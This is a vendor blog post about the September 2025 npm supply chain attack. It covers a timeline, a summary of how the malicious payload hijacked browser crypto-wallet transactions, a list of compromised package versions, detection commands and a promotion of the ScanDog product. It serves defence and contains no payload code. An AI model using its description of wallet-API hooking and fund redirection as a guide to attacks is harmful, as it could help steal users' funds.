Supply chain attacks are no longer rare anomalies. They are becoming one of the most direct and damaging paths into modern software systems. On September 8th 2025 that reality became impossible to ignore. Attackers slipped malicious code into some of the most widely used npm packages on the planet ; including chalk, debug, ansi regex and others downloaded billions of times each month.
This was not a theoretical exercise. It was a coordinated supply chain attack designed to quietly hijack crypto wallet interactions inside browser based applications, rewrite transaction destinations and exfiltrate sensitive data. Within hours, compromised versions of popular libraries had already been pulled into build pipelines, shipped to production and embedded deep inside frontend bundles.
Incidents like this reveal how fragile the software supply chain can be. And they highlight why visibility, SBOM based monitoring and dependency reachability analysis matter for every engineering team. Platforms such as ScanDog help teams detect malicious package versions instantly and understand whether they are executed in their applications.
How the npm Supply Chain Attack Unfolded
The attack moved quickly. By the time the malicious versions were removed, countless projects had already installed them as part of automated builds.
A brief timeline
- A maintainer’s npm account was compromised through phishing.
- Malicious versions were published within hours.
- Developers unknowingly pulled compromised versions through normal installs.
- Security researchers spotted suspicious browser based behaviour.
- npm security intervened, but the window had already allowed widespread propagation.
This pattern underscores a difficult truth. The security of your application depends not only on your code, but on every dependency you trust.
How the Malicious Payload Worked
Researchers who de obfuscated the payload discovered something particularly concerning. The attack activated only when bundled into frontend code and executed in a browser, making seemingly harmless output formatting libraries a perfect delivery vehicle.
What the payload did
- Intercepted wallet and network related APIs
- Rewrote transaction destinations to redirect funds
- Exfiltrated crypto wallet data for later use
- Remained dormant in Node.js environments to evade detection
This combination made the attack both targeted and deceptive ; dangerous for any application interacting with web3, browser wallets or crypto transactions.
Confirmed Malicious Package Versions
Security teams have published a list of compromised releases. If any of these versions appear in lockfiles, SBOMs or deployed bundles, treat them as compromised:
chalk — 5.6.1
chalk-template — 1.1.1
ansi-regex — 6.2.1
strip-ansi — 7.1.1
wrap-ansi — 9.0.1
slice-ansi — 7.1.1
ansi-styles — 6.2.2
supports-color — 10.2.1
supports-hyperlinks — 4.1.1
has-ansi — 6.0.1
debug — 4.4.2
color-convert — 3.1.1
color-name — 2.0.1
color — 5.0.1
color-string — 2.1.1
simple-swizzle — 0.2.3
is-arrayish — 0.3.3
backslash — 0.2.1How to Check Whether You Are Affected
Supply chain attacks demand fast verification. Teams should begin with a simple, structured checklist.
Step one: Search your repository for exact versions
grep -R "[email protected]" package-lock.json yarn.lock node_modules -n
npm ls [email protected]Step two: Scan with an SBOM
Generate an SBOM using syft or cdxgen and run it through a scanner such as grype. This filters dependency chains where malicious versions may be nested.
syft . -o json > sbom.json
grype sbom:sbom.jsonStep three: Inspect built frontend bundles
Because the payload executes only in browsers, production bundles must be examined carefully for wallet related strings, window.ethereum hooks or exact compromised versions.
If detected, respond as you would for a confirmed incident.
Immediate Remediation Checklist
- Check your lockfiles and SBOMs for the compromised versions
- Rebuild using clean environments, avoiding cached node modules
- Pause deployments until all dependencies are validated
- Rotate secrets such as npm tokens and CI credentials
- Treat any exposure as a security incident
These steps buy back control during the first hours, when it matters most.
How ScanDog Helps During a Supply Chain Attack
When an npm supply chain attack hits, the critical question becomes immediate. Are we exposed? And if so, where?
ScanDog helps answer this without guesswork.
Instant detection through SCA and SBOM monitoring
ScanDog scans repositories and pipelines against live SCA feeds, flagging malicious npm versions automatically. No manual searching required.
Clarity through reachability analysis
Dependency scanning often produces noise. ScanDog’s reachability engine shows whether vulnerable or malicious functions are actually executed in your application, allowing teams to prioritise real impact.
Automated containment workflows
ScanDog can block builds containing compromised versions, open remediation tickets and alert teams in Slack or Teams to prevent further exposure.
Faster remediation with AI Fix
The platform suggests safe versions, generates pull requests and explains changes clearly so engineering teams can move quickly and confidently. Learn more about AI Fix.
Centralised visibility through the Remediation Center
Teams can see which repositories are affected, who owns the fix and what has already been resolved through the Remediation Dashboard.
This transforms the response from ad hoc searches and scattered Slack threads into a calm, structured workflow.
Final Thoughts: Supply Chain Security Is Now a Daily Reality
The npm attack is a reminder of how deeply software ecosystems depend on trust. A single compromised maintainer account can send malicious code into millions of projects within hours. Dependency transparency, continuous SBOM monitoring and reachability based prioritisation are no longer optional. They are essential.
With modern tools and structured workflows, teams can respond quickly when incidents arise and maintain the confidence that what they ship is trustworthy.
ScanDog is an AI-powered Application Security Posture Management (ASPM) platform that helps development teams build secure software faster. With advanced vulnerability prioritization, reachability analysis, and AI-assisted remediation, ScanDog cuts through the noise of false positives to focus on what truly matters.